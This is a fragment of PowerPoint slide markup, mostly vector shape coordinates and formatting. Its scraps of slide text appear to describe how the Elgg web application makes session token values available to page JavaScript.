          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9938766" y="3348354"/>
            <a:ext cx="952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Token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4" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA23C27B-6F09-D9B4-4430-6B7573E872C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315961" y="3859529"/>
            <a:ext cx="3663950" cy="304800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3663950" h="304800">
                <a:moveTo>
                  <a:pt x="3663696" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3661691" y="59334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3656234" y="107775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3648158" y="140428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3638296" y="152400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1857248" y="152400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1847385" y="164371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1839309" y="197024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1833852" y="245465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1831848" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829843" y="245465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1824386" y="197024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816310" y="164371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1806448" y="152400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="152400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15537" y="140428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7461" y="107775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2004" y="59334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F2E593CA-8C20-4CBA-51CF-22C8D9DE97CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6861429" y="4177995"/>
            <a:ext cx="49745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These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User’s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session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(We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 some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Javascript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magic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these!)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14C4A717-0E29-1411-AADC-817D636B6007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180975" y="3990213"/>
            <a:ext cx="51244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var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elgg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endParaRPr sz="1800">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="62230" marR="9969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{"config":{"lastcache":1587931381,"viewtype":"de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fault","simplecache_enabled":1,"current_languag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7" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01304317-C35E-67C5-DE68-817BFC3943C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="209422" y="4834890"/>
            <a:ext cx="5004435" cy="586740"/>
            <a:chOff x="209422" y="4834890"/>
            <a:chExt cx="5004435" cy="586740"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78EA0059-CF39-983B-2597-5764B0912512}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2252725" y="5108829"/>
              <a:ext cx="2961005" cy="313055"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2535174" y="307373"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2482344" y="307405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2489073" y="307721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2508123" y="310007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2516504" y="311277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="312674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="307373"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2641131" y="96611"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="96691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="307340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="307373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="312674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643124" y="312674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643124" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641131" y="96611"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2960751" y="50038"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2852801" y="50038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2849245" y="52578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844038" y="55245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821940" y="60071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812796" y="61087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779014" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2740914" y="89281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2700654" y="96520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641131" y="96611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643124" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643124" y="312674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808604" y="312547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848864" y="305308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2886964" y="289687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907791" y="280543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2910966" y="279527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2932429" y="275971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937510" y="275463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939923" y="274955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942463" y="274447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944876" y="273812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960751" y="266065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960751" y="50038"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1668779" y="60198"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1668779" y="276225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620555" y="276500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753235" y="277114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1927860" y="287655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993138" y="292354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274570" y="307467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274570" y="91567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380008" y="91437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101215" y="76327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1861185" y="61087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668779" y="60198"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2380008" y="91437"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2274570" y="91567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2274570" y="307467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382520" y="307467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382520" y="91567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380008" y="91437"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2480945" y="91313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2380008" y="91437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382520" y="91567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382520" y="307467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482344" y="307405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2480945" y="307340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2480945" y="91313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2589022" y="91313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2480945" y="91313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2480945" y="307340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482344" y="307405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="307373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="96691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="91313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2589022" y="96691"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535174" y="307373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="307340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="96691"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1229124" y="56007"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1142364" y="56007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142364" y="272034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230884" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230884" y="56134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229124" y="56007"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1488008" y="60718"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="61341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523873" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523873" y="61341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488008" y="60718"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1560829" y="60198"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1488008" y="60718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523873" y="61341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523873" y="277368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620555" y="276500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560829" y="276225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560829" y="60198"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1668779" y="60198"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1560829" y="60198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560829" y="276225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620555" y="276500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668779" y="276225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1668779" y="60198"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="563118" y="14986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="563118" y="231013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456057" y="231059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655574" y="241681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717042" y="244348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759079" y="246634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880110" y="256286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911732" y="257429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032510" y="264541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081277" y="266954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1099058" y="269494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104773" y="270510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110614" y="271272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122807" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122807" y="56134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229124" y="56007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1218564" y="55245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212850" y="54483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207135" y="53467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189354" y="50927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140460" y="48641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1019683" y="41529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988187" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867156" y="30607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824992" y="28321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763651" y="25654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563118" y="14986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1142364" y="56007"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1122807" y="56134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122807" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148143" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142364" y="272034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142364" y="56007"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1250314" y="56007"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1229124" y="56007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230884" y="56134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230884" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250314" y="272034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250314" y="56007"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="1250314" y="56007"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1250314" y="272034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230884" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="61341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488008" y="60718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250314" y="56007"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="107950" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14859" y="222250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16891" y="222758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21717" y="223393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30099" y="225044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39750" y="227330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49403" y="229108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59181" y="230505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80010" y="232029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80010" y="16129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130937" y="15748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160019" y="15113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175139" y="15106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167259" y="14478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157480" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147700" y="11303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138049" y="9017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="7366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109728" y="1143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107950" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="175139" y="15106"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160019" y="15113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130937" y="15748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80010" y="16129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80010" y="232029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="232029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="16129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175139" y="15106"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="455168" y="14986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175139" y="15106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="16129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="232029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238887" y="231775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267969" y="231140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456057" y="231059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455168" y="231013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455168" y="14986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="563118" y="14986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455168" y="14986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455168" y="231013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456057" y="231059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563118" y="231013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563118" y="14986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2961004" h="313054">
                  <a:moveTo>
                    <a:pt x="2589022" y="91313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="96691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641131" y="96611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2624454" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2616200" y="93980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2597023" y="91694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589022" y="91313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF851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29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD69B20-01C2-DD7D-E4D1-AB52D2336BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="209423" y="4834890"/>
              <a:ext cx="4923155" cy="547370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4923155" h="547370">
                  <a:moveTo>
                    <a:pt x="480669" y="331089"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="474319" y="330962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428218" y="325755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345122" y="324866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270167" y="324485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108000" y="320421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="320421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="536448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162166" y="540512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237121" y="540893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320217" y="541782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366318" y="546989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480669" y="547116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480669" y="331089"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4923155" h="547370">
                  <a:moveTo>
                    <a:pt x="4922647" y="45847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4819739" y="45847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662678" y="43688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4572254" y="41275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436872" y="34544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4384040" y="31242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4356481" y="30226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4285234" y="23368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4181983" y="15748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4162425" y="14859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4155567" y="13970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4122166" y="5207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120642" y="4699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119118" y="4445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4118610" y="4318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4118102" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4117467" y="3937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4115943" y="3175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4115562" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4115054" y="2667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4114546" y="2286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4114165" y="2032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113784" y="1651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113276" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4112895" y="889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4112514" y="381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4112133" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4004183" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4004183" y="216027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4005707" y="217551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006215" y="217932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4006596" y="218313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4007104" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4007485" y="218948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4009517" y="219964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010025" y="220091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010533" y="220345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011168" y="220472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4012692" y="220726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4014089" y="221234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4054475" y="230886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073906" y="231648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4177284" y="239395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4248531" y="246253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4276090" y="247269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4328922" y="250571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4464177" y="257302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4554601" y="259715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4739513" y="262255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4847463" y="262255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4922647" y="261747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4922647" y="45847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
